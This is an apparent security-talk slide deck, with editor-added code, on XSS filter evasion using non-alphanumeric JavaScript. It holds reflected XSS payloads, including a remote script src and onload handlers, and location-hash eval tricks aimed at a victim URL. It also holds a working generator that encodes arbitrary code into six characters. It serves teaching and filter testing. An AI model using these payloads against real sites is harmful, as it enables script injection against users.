Writing JavaScript without numbers or letters

Writing JavaScript without numbers or letters: an old but fun topic.


1. The Great JavaScript Wall.
2. The condition: you can't use numbers or letters.
3. ⦿ Real-life scenario: an XSS filter blocks alphanumeric characters.
   ⦿ It can defeat XSS filters.
   ⦿ It may not be easily detected.
   ⦿ The smartest answer is simply: because we can.
4. $ whoami
   Nahidul Kibria, @nahidupa
   Synack Red Team; Co-Leader, OWASP Bangladesh Chapter; Principal Software Engineer, Orbitax Bangladesh Ltd.
   Writing code for fun and food. Security enthusiast.
5. HTML and JavaScript live side by side, so if a user inserts malicious JavaScript into the page, it executes on the client side.
6. Request:
     http://www.example.com/?name=<script>alert('XSS')</script>
   Response:
     <html>
       <body>
         <p>Hello <script>alert('XSS')</script></p>
       </body>
     </html>
7. ⦿ ASP.NET built-in protection
   ⦿ Microsoft Anti-XSS library
   ⦿ AntiSamy
   ⦿ ModSecurity
   ⦿ Angular $sanitize
8. ⦿ Goal: remove all scripts from untrusted HTML.
   ⦿ Challenges:
     • many HTML features allow scripting
     • proprietary extensions to HTML, e.g. <svg>
     • parsing of invalid HTML (browsers accept it)
     • browser bugs
9. ⦿ Script tags
     • <script src="http://www.example.com/xss.js">
   ⦿ Event handler attributes
     • <body onload="alert('XSS')">
   ⦿ CSS
     • <p style="background:url('javascript:alert(1)')">
   ⦿ URLs
     • <img src="javascript:alert('XSS')">
   (The javascript: URL in an img src or a CSS url() only ran in legacy browsers; script src and on* handlers work everywhere.)
10. Filter approaches:
    • string-matching filters
    • HTML DOM parsers
    • canonicalization
    • whitelisting
11. Remove all script tags: s/<script>//g;
    Bypasses:
    ▪ invalid HTML accepted by browsers
    ▪ encoding of attribute values and URLs
    ▪ using the filter against itself: <scr<script>ipt> (one pass of the filter leaves <script>)
    ▪ incomplete blacklists
12. <body onload="alert(1)"> <script>alert(2)</script> <p>Hello</p> </body>
    Stripping the <script> element removes alert(2), but the onload handler still fires.
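The blacklist filter of slide 11 against the bypasses of slides 11 and 12, next to the fix that actually works for the reflected case of slide 6. This is an added example written by the editor, not code from the slides; the payload strings are constructed for the demonstration and the `DANGEROUS` pattern is a deliberately crude tester's check, not a sanitizer.

```javascript
// The slide's filter: a single pass that deletes the literal <script> tag.
function blacklistFilter(html) {
  return html.replace(/<script>/g, '');
}

// The fix for data rendered inside an element's text content: HTML-entity
// encode instead of trying to recognise script.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed payloads (not real traffic).
const PAYLOADS = {
  plain:     "<script>alert('XSS')</script>",
  nested:    "<scr<script>ipt>alert('XSS')</script>",  // the filter rebuilds the tag
  handler:   '<body onload="alert(1)"><script>alert(2)</script><p>Hello</p></body>',
  uppercase: "<SCRIPT>alert('XSS')</SCRIPT>",          // the blacklist is case-sensitive
};

// Crude post-filter check: a <script tag, or an on*= attribute inside a tag.
const DANGEROUS = /<script|<\w+[^>]*\son\w+\s*=/i;

// Does the payload still carry a script-capable construct after filtering?
function survives(payload) {
  return DANGEROUS.test(blacklistFilter(payload));
}

// The slide 6 page, done right: the user value is encoded for the text context.
function render(name) {
  return `<p>Hello ${escapeHtml(name)}</p>`;
}
```

Every payload except the trivial one survives the blacklist, while `render` leaves nothing for the browser to execute because `<` never reaches the parser as markup.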
13. ⦿ Getting a window reference.
    ⦿ The literal 'window' is blacklisted by the XSS filter.
    ⦿ Why are we interested in 'window'? A window reference gives you more opportunities, like:
      • opening a popup
      • redirecting via window.location
      • reading and writing the window title, and lots more
14. // all browsers (at the time)
    ⦿ window;
    ⦿ self;
    ⦿ open().opener;
    ⦿ Date.constructor('return this')()
    ⦿ document.documentElement.ownerDocument.defaultView
    ⦿ x=''.split, x(null)
    ⦿ __proto__.__parent__
    ⦿ (function(){}).__proto__.__parent__
    Caveat: the detached-method trick (x=''.split, x(null)) relied on old engines treating an undefined `this` as the global object; ES5 and later engines throw a TypeError for it. __parent__ was a Mozilla-only property and no longer exists. Date.constructor('return this')() is just Function('return this')() and still works in sloppy code, but a Content Security Policy without 'unsafe-eval' blocks the Function constructor.
15. Numbers or letters not allowed.
    ⦿ So we first try to get a window reference.
    ⦿ Then, for a PoC, just show window.alert(1).
    ⦿ Let's try to write x=[].sort; x(1). Any idea?
    (In the engines of the time a detached [].sort call returned the global object; modern engines throw a TypeError instead, so the letter-building below is the part that still carries over.)
16. ⦿ Variable names can be Unicode or certain symbols:
      • _ , $, ٥, ੫, ੪, ૨, ୩, ୫, ୬, ୯ etc.
      (Note: per the ECMAScript grammar, Unicode digit characters such as ٥ are only valid after the first character of an identifier; an identifier must start with a letter, _ or $.)
    ⦿ Dynamically and weakly typed; values convert freely:
      • var x=+'2'; // '2' is a string, unary + turns it into the number 2
      • x=x+1;      // x → 3
    ⦿ Arrays and objects become strings in concatenation:
      • x=[1]+[true] // x → '1true'
      • x=1+true     // x → 2
    ⦿ Strings can be treated as arrays of characters:
      • x='test' // x[0] → 't', x[1] → 'e', x[2] → 's', x[3] → 't'
    ⦿ Array notation can be used for methods/properties:
      • x=window['alert']; // x(1) calls alert(1)
17. !0 → true            +false → 0      ''+false → 'false'
    !1 → false           +true → 1       ''+true → 'true'
    !'anystring' → false +'' → 0         ''+{} → '[object Object]'
    !'' → true           +'any' → NaN
    ![] → false          +[] → 0
    !{} → false          +{} → NaN
18. +[] == +'' == 0
    var º=+[]; // º == 0
    a=++º;     // a == 1, º == 1
    b=º++;     // b == 1, º == 2
    c=º;       // c == 2
    d=º/º;     // d == 1
    e=-º;      // e == -2
    f=~º;      // f == -3
    g=º*º;     // g == 4

19. var _='';   // !_ == true, ''+{} == '[object Object]'
    Ø=!_+{};    // Ø == 'true[object Object]'
    f=!Ø+_;     // f == 'false'
    º=+_;       // º == 0
    Ţ=Ø[º];     // Ţ == 't'
    ℝ=Ø[++º];   // ℝ == 'r', º == 1
    Ŝ=f[º+++º]; // parsed as (º++)+º, so f[3]: Ŝ == 's', º == 2
    Ò=Ø[º+++º]; // Ø[5]: Ò == 'o', º == 3
21. ⦿ Ŝ+Ò+ℝ+Ţ == 'sort'
    ⦿ [][Ŝ+Ò+ℝ+Ţ] == [].sort
    ⦿ [a=1,b=1][Ŝ+Ò+ℝ+Ţ] == [].sort   // the assignments can live inside the array literal
    ⦿ [_='', Ø=!_+{}, f=!Ø+_, º=+_, Ţ=Ø[º], ℝ=Ø[++º], Ŝ=f[º+++º], Ò=Ø[º+++º]][Ŝ+Ò+ℝ+Ţ] == [].sort

22. ⦿ So we have window; now what?
    ⦿ To get eval we need a 'v': ''+([].sort) → 'function sort() { [native code] }'
    ⦿ But getting some letters can be difficult, perhaps even impossible.
    ⦿ true, false and object only provide 12 letters.
    ⦿ ''+1/0 → 'Infinity' gives an 'n'
    ⦿ /./['constructor'] gives a 'p' (''+RegExp → 'function RegExp() { [native code] }')
    ⦿ String.fromCharCode requires letters such as 'h' and 'C'
    ⦿ What if we could load code from elsewhere?
    ⦿ window.name
    ⦿ location.hash
23. ⦿ window.name='alert(1)'; window['eval'](window['name'])
    ⦿ window.name='javascript:alert(1)'; window['location']=window['name']
    ⦿ By the way, getting an 'm' can take a lot of code.
    ⦿ http://url/#javascript:alert(1) then window['location']=window['location']['hash']
    ⦿ but getting 'hash' requires an 'h'
24. ⦿ æ=window, _='location'
    ⦿ http://url/#javascript:alert(1)
    ⦿ æ[_]=æ['eval']('/*'+æ[_])
    ⦿ http://uri/#*/alert(1)//eval
    ⦿ æ[_]=æ[($='/*'+æ[_])['slice'](-4)]($)
    ('/*'+location turns the URL up to the fragment's '*/' into a comment, so the fragment must start with */ for this to parse; slice(-4) then cuts the trailing 'eval' off that same string, so the method name never has to be spelled out.)
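The two "load code from the URL" tricks of slide 24, as an added example (the editor's code, not the speaker's). The browser's `location` is replaced by a constructed URL string so the mechanics run outside a browser; in a page, `'' + location` is the full URL including the fragment, which is what the '/*' prefix comments out.

```javascript
// Build the URL an attacker would send: the fragment opens with "*/" to close
// the comment that '/*' + location starts, and ends with "//" so anything
// after the payload (for the slice variant, the literal "eval") is ignored.
function craftUrl(base, code, tail = '') {
  return `${base}#*/${code}//${tail}`;
}

// Slide: æ[_] = æ['eval']('/*' + æ[_])
function evalViaLocation(location) {
  return eval('/*' + location);
}

// Slide: æ[_] = æ[($ = '/*' + æ[_])['slice'](-4)]($)
// "eval" is sliced off the end of the URL instead of being spelled, so no
// letter has to be conjured for the method name.
function evalViaSlice(location) {
  const æ = globalThis;            // stands in for window
  const $ = '/*' + location;
  return æ[$['slice'](-4)]($);
}

// Check before trying the trick: without "*/" at the start of the fragment,
// '/*' + location is an unterminated comment and eval throws a SyntaxError.
function fragmentCloses(location) {
  const hash = location.slice(location.indexOf('#'));
  return hash.startsWith('#*/');
}

// Constructed URLs; 6*7 stands in for alert(1).
const URL_A = craftUrl('http://uri/', '6*7');          // http://uri/#*/6*7//
const URL_B = craftUrl('http://uri/', '6*7', 'eval');  // http://uri/#*/6*7//eval
const URL_BAD = 'http://url/#javascript:alert(1)';     // no "*/", cannot be eval'd this way
```

The assignment to `location` on the slide is what turns the evaluated `javascript:` string into navigation; here the functions simply return the evaluated value.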
25. In Firefox, only executing alert(1):
    ⦿ first idea: 472 characters
    ⦿ latest entry: 63 characters
    Arbitrary code, no btoa:
    ⦿ first: 154
    ⦿ latest: 103
    Arbitrary code, cross-browser:
    ⦿ first: 240
    ⦿ latest: 160
26. ⦿ So far we have assigned variables and used Unicode characters that look like letters.
    ⦿ But if we build each part of the string from scratch, we don't even need variable names.
    ⦿ What is the smallest set of characters required to execute arbitrary JavaScript?
27. First attempt, 8 characters: []+,!()/
    ([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(!![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+[]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])]+(![]+[])[+!![]]+(![]+[])[!![]+!![]]](([]+([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(![]+[])[!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+!![]]])[(![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]]((+!![]/+([]+(+!![])+(+!![])+(+!![])+(+!![])+(+!![])+(+!![])+(+!![]))+[])[(+!![])+[]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])]+(!![]+!![]))+([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(![]+[])[!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+!![]]])
    Executes: eval((''+location).slice(-2)+location)
    Use with: http://www.victim.com/#"alert(1)//"
28. ⦿ Reduced 7-character set: []+,!()
    ⦿ 6-character sets:
      • []+!()
      • []+=()
      • []+=/_
    ⦿ And that's the wall:
      • [] and + are always required
      • they let you generate undefined, Infinity and NaN
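The slides show hand-built instances of the wall; this added example (the editor's code, not the speaker's, and not the 8-character golf above) generalises slides 16 to 28 into a small generator for the 6-character set []()+!. It builds every string from the coercions of slides 16 to 19 (true, false, undefined, NaN, the source text of a native function, and (n).toString(36)) and reaches the Function constructor through []['filter']['constructor'], so it does not depend on the old [].sort-returns-window behaviour. Assumed: an engine whose String(nativeFunction) begins with "function <name>", which V8 and SpiderMonkey share; the c/o/S/g lookups index into that prefix. Supported payload characters are a-z, 0-9, space and ( ) {; anything else throws.

```javascript
// The number n using only !![] and +: 0 is +[], 1 is +!![], n is !![]+!![]+...
function num(n) {
  if (n === 0) return '+[]';
  if (n === 1) return '+!![]';
  return Array(n).fill('!![]').join('+');
}
function digit(n) { return `(${num(n)}+[])`; }   // the string "n"

// Strings that exist before any letter is spelled (parenthesised so they can
// be appended with + without changing meaning).
const SOURCES = {
  false: '(![]+[])',
  true: '(!![]+[])',
  undefined: '([][[]]+[])',
  NaN: '(+[![]]+[])',
};

const memo = new Map();
function charExpr(c) {
  if (memo.has(c)) return memo.get(c);
  let e;
  if (c >= '0' && c <= '9') e = digit(+c);
  for (const [word, src] of Object.entries(SOURCES)) {
    if (!e && word.includes(c)) e = `${src}[${num(word.indexOf(c))}]`;
  }
  if (!e && 'co (){'.includes(c)) {
    // ''+[].filter starts with "function filter() {" in every major engine
    e = `([][${str('filter')}]+[])[${num('function filter() {'.indexOf(c))}]`;
  }
  if (!e && 'Iy'.includes(c)) {
    // +'1e1000' is Infinity, whose string form supplies I and y
    e = `(+(${str('1e1000')})+[])[${num('Infinity'.indexOf(c))}]`;
  }
  if (!e && 'Sg'.includes(c)) {
    // ''['constructor'] is String; ''+String starts with "function String"
    e = `(([]+[])[${str('constructor')}]+[])[${num('function String'.indexOf(c))}]`;
  }
  if (!e && c >= 'a' && c <= 'z') {
    // every remaining lowercase letter is a base-36 digit: (10..35).toString(36)
    e = `(${num(parseInt(c, 36))})[${str('toString')}](${num(36)})`;
  }
  if (!e) throw new Error(`no encoding for ${JSON.stringify(c)}`);
  memo.set(c, e);
  return e;
}

// A whole string: one expression per character, joined with +.
function str(s) { return [...s].map(charExpr).join('+'); }

// [].filter.constructor is Function; feeding it the encoded source and
// calling the result runs the payload.
const FUNCTION = `[][${str('filter')}][${str('constructor')}]`;
function compile(code) { return `${FUNCTION}(${str(code)})()`; }
function isWallOnly(src) { return /^[\[\]()+!]+$/.test(src); }

// Stand-alone check: 'return this' must come back as the global object
// (Function-created code is always sloppy, so `this` is the global).
const program = compile('return this');
if (!isWallOnly(program)) throw new Error('an alphanumeric leaked into the output');
if (eval(program) !== globalThis) throw new Error('payload did not run');
```

Nothing in the output is a letter or digit, which is why a filter that blocks alphanumerics does not help: the letters are manufactured at run time from the coercions the slides walk through. The memo keeps the generated program from repeating the 'filter' and 'constructor' expansions for every character, which is also where most real-world shortening effort goes.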
29. Learn from the Internet... Some real masters are: Joey Tyson, Gareth Heyes, LeverOne, David Lindsay.
30. If you have no questions, thanks.
